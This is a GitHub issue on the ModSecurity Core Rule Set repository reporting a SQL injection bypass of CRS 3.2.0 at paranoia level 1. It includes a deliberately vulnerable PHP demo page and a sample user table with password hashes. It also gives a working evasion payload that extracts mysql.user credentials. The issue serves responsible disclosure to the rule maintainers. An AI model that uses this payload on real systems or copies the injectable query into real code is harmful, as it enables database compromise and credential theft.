Skip to content
This repository has been archived by the owner on May 14, 2020. It is now read-only.

SQLi bypass at PL1(CRS 3.2.0) #1727

Open
seedis opened this issue Mar 28, 2020 · 1 comment
Open

SQLi bypass at PL1(CRS 3.2.0) #1727

seedis opened this issue Mar 28, 2020 · 1 comment
Labels
False Negative - Evasion

Comments

@seedis
Copy link

seedis commented Mar 28, 2020
edited
Loading

Description

Fuzz found that the following request can bypass modesecurity rules and implement SQLi injection.
sample code:user.php(id parameter has SQL injection security issues)

<?php
echo "<head><title>SQL injection demo</title></head>";
$id=$_GET['id'];
$conn=new mysqli('127.0.0.1','root','root','test');
if(!$conn){
	die("Error to connect database!");
	}
	$sql="select username from user where id={$id}";
#	echo "$sql"."</br></br>";
	$res=$conn->query($sql);
	if($res){
	    $row=$res->fetch_row();
		    echo "\t Hello <b>".htmlspecialchars($row[0])." </b>,having a good day!";
			$res->free();
			$conn->close();
		}
	else{
			echo "<b>error</b>";
		}
?>

Database table contents:

mysql> use test;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from user;
+----+----------+----------------------------------+
| id | username | passwd                           |
+----+----------+----------------------------------+
|  1 | admin    | 21232f297a57a5a743894a0e4a801fc3 |
|  2 | root     | 63a9f0ea7bb98050796b649e85481845 |
|  3 | test     | 098f6bcd4621d373cade4e832627b4f6 |
+----+----------+----------------------------------+
3 rows in set (0.00 sec)
The request is as follows:

Normal request

http://127.0.0.1/user.php?id=1

image
evil request:
id=1 and 1=1 (blocked by CRS)
image
request(bypass CRS3.2.0) for SQL injection:

http://127.0.0.1/user.php?id=@.:=right(right((select authentication_string from mysql.user limit 0,1),1111),1111) union%23%0adistinctrow%0bselect@.

image
It can be seen that the user password in the user table in the mysql database is successfully obtained through this bypass method.

Environment

  • CRS version (e.g., v3.2.0): v3.2.0
  • Paranoia level setting: PL1
  • ModSecurity version (e.g., 2.9.3): 2.9.3/3.0.4
  • Web Server and version (e.g, apache 2.4.41): apache2.4.18/nginx1.16.1
  • Operating System and version: Ubuntu18.04
  • Mysql Version: 5.7.29

Looking forward to fixing it as soon as possible beacause it threatens the security of the database content.
@seedis
Copy link
Author

seedis commented Apr 2, 2020
edited
Loading

@dune73 Can you help reproduce this bypass tricks when you have free time(I have added
my database structure information above for easy reproduction).Looking forward to your reply, thanks.

@franbuehler franbuehler mentioned this issue May 4, 2020
Closed
@CRS-migration-bot CRS-migration-bot mentioned this issue May 13, 2020
Closed
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
False Negative - Evasion
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@seedis